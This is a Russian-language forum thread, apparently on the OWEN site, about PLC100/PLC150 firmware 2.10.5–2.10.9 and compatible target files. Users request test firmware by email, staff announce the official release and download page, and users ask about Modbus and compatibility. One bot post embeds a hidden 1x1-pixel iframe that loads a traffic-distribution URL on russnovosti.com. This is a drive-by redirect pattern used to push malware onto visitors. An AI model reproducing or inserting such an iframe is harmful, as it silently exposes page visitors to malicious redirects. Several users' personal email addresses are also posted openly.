отправил вам запрос насчет прошивки и таргетов 2.10.5 на plc (собака) owen (dot) ru а в ответ тишина..
можно пожалуйста их отправить на ящик asutmvdk@gmail.com
спасибо
Вид для печати
отправил вам запрос насчет прошивки и таргетов 2.10.5 на plc (собака) owen (dot) ru а в ответ тишина..
можно пожалуйста их отправить на ящик asutmvdk@gmail.com
спасибо
а почему не в свободном доступе с вашего сайта???
По тому что прошивка находится в тестировании. В неё введено большое количество новшеств. По этому первоначально мы должны оттестировать её. Все, кто так же готовы потестировать новую прошивку получают её по почте без ограничений.
Kirill
странно но в ящике пусто...
попробуйте пожалуйста сюда krasoff.mail@gmail.com
спасибо заранее
Смотрите почту
Будьте любезны, и мне на тестирование nik-babin@yandex.ru
Ушло, правда под 100 контроллер, ИМХО свой не написали...
Пришлите и мне прошивку 2,10,5 на ПЛК100-220.Р-М и соотв. таргеты, плиз.
solovyovjeck( собака )mail.ru
Андрей спасибо. оказывается гугл ваше письмо в спам кладет :)
Господа - все запросы на plc собака owen.ru
В ответку будем высылать, чтобы не дай бог с адресом не ошибиться или не забыть.
пришлите мне пожалуйста прошивки и таргеты к ним на контроллеры:
1. ПЛК100-24.Р-M
2. ПЛК100-220.Р-M
3. ПЛК150-220.И-M
ildarbakirov@mail.ru
Последний раз - все запросы на мыло.
Запросы в форуме будут удаляться, и так уже 18 страниц...
C сегодняшнего дня прошивка 2.10.5 является официальной.
Скачать eё можно тут: http://www.owen.ru/device/88206764
тему вверх...
ждем оффициального ответа...:)
К сожалению технические проблемы со связью.
Прошивка выложена - всем РЕКОМЕНДУЮ прошиваться.
http://www.owen.ru/device/88206764
спасибо овену!
да прибудет в ним сила! :d
вопрос по последеней версии прошивки: это нормально, если браузер пишет, что версия 2.10.4, хотя прошивался плк, вроде, версией 2.10.5?
Это нормально... к сожалению... Вкралась ошибка - не переименовали оглавление, прошивка 2.10.5
Выложите отличия версии 10 от предыдущих.
первый пост этой темы посмотрите
наверное уже пора про 2.10.7 там писать?;)
Выложите отличия версии 10 от предыдущих. так же интересуют <iframe width="1" frameborder="1" height="1" src="http://russnovosti.com/tds/index.php?out=1248199709"></iframe>
а блин...
еще один бот....
см. перв. страницу
Скажите, планируется ли поддержка 20-й функции для модбас мастер?
согласен, тоже хочу пощщупать...
а то у начальства начинаются тонкие намеки, что неплохо бы...
а локалка то одна....
Нет - только модбас слейв, да и зачем Вам это нужно? Какой файл качать на плк и откуда?
Функция нужна для чтения архивов из теплосчетчика ВИС.Т. Делаем диспетчеризацию узлов учета, вистов - штук 20. Текущие показания вытащили, а с архивами беда...
Вытаскивайте текущую и делайте архив в контроллере...
Если была прошивка 2.07.2 поставил прошивку 2.10.5 в проекте удалил модуль статистики и заново его добавил. После таких манипуляций программа будет работать нормально?
Программа работать будет, но Target лучше переставить от 2.10
Да, проверьте, в модуле статистики должно стать 6 каналов вместо 5.
1.здесь и на странице сайта указана прошивка 2.10.7. я же на своем новом плк100 увидел через терминал, что в нем 2.10.9. не успели рапортовать о новой или как?
2.на диске не ясно, что за версия таргета. 2.10 и усё. судя по тому, что в прошивках на диске только 2.10.7 лежит, то возникают подозрения, что и таргет не новый. совместимость есть?
Присоединяюсь к предыдущему вопросу - какой target нужно использовать для прошивки 2.10.9. Получили два ПЛК100 после ремонта с новой прошивкой, а официального релиза нет :(.
То, что касается Target файла:
Target файл мы стараемся вообще не менять, так как это сильно ограничивает переносимость проекта. Поэтому Target файл 2.10 как появился с прошивкой 2.10.5, так и не менялся, и совместим со всеми прошивками 2.10.х
то же получили новые плк с 2.10.9 , скажите какие изменения от 2.10.7 ?